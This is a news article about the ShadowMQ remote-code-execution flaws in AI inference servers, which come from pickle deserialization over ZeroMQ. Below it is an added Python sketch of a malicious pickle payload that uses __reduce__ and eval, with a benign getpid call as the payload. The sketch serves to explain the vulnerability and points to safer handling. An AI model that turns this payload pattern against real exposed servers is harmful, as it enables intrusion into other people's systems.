By AnuPriya
Publication Date: 2025-11-17 09:47:00
Security researchers at Oligo Security have uncovered a series of critical Remote Code Execution vulnerabilities affecting widely deployed AI inference servers from major technology companies.
The flaws impact frameworks developed by Meta, NVIDIA, Microsoft, and open-source projects, including vLLM, SGLang, and Modular, potentially exposing enterprise AI infrastructure to serious security risks.
The vulnerabilities stem from a common root cause dubbed ShadowMQ—the unsafe use of ZeroMQ (ZMQ) combined with Python’s pickle deserialization mechanism.
This security flaw spread across multiple AI frameworks through code reuse, with developers copying vulnerable code patterns from one project to another, sometimes line-for-line.
The problem originated with Meta’s Llama Stack, where researchers discovered the use of ZMQ’s recv_pyobj() method, which deserializes incoming data using Python’s pickle module.
This creates a critical security issue because pickle can execute arbitrary code during deserialization: any attacker who can reach the exposed ZMQ socket can send a crafted payload and achieve remote code execution on the host.
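The danger can be illustrated with a minimal sketch (not taken from the article): pickle invokes an object's `__reduce__` hook during deserialization, so a crafted payload runs attacker-chosen code the moment it is unpickled. ZMQ's `recv_pyobj()` is essentially `pickle.loads(socket.recv())`, which is why exposing it to untrusted peers is equivalent to handing them code execution. The `Malicious` class and the benign `getpid` payload below are illustrative stand-ins, not the researchers' actual exploit.

```python
import pickle

class Malicious:
    """Illustrative payload class: pickle calls __reduce__ on deserialization."""

    def __reduce__(self):
        # On unpickling, pickle will call eval(...) with this string.
        # A real attacker would substitute any command; a harmless
        # getpid() call is used here for demonstration.
        return (eval, ("__import__('os').getpid()",))

# What an attacker would send over the wire.
payload = pickle.dumps(Malicious())

# The vulnerable server-side pattern: recv_pyobj() boils down to
# pickle.loads() on raw network bytes, so this line runs the
# attacker-controlled code.
result = pickle.loads(payload)
print(result)  # the sandbox's own PID, proving code executed
```

Safer alternatives send plain bytes or a restricted format (e.g. JSON via `recv_json()`) and validate the message before acting on it, rather than trusting the peer to supply arbitrary Python objects.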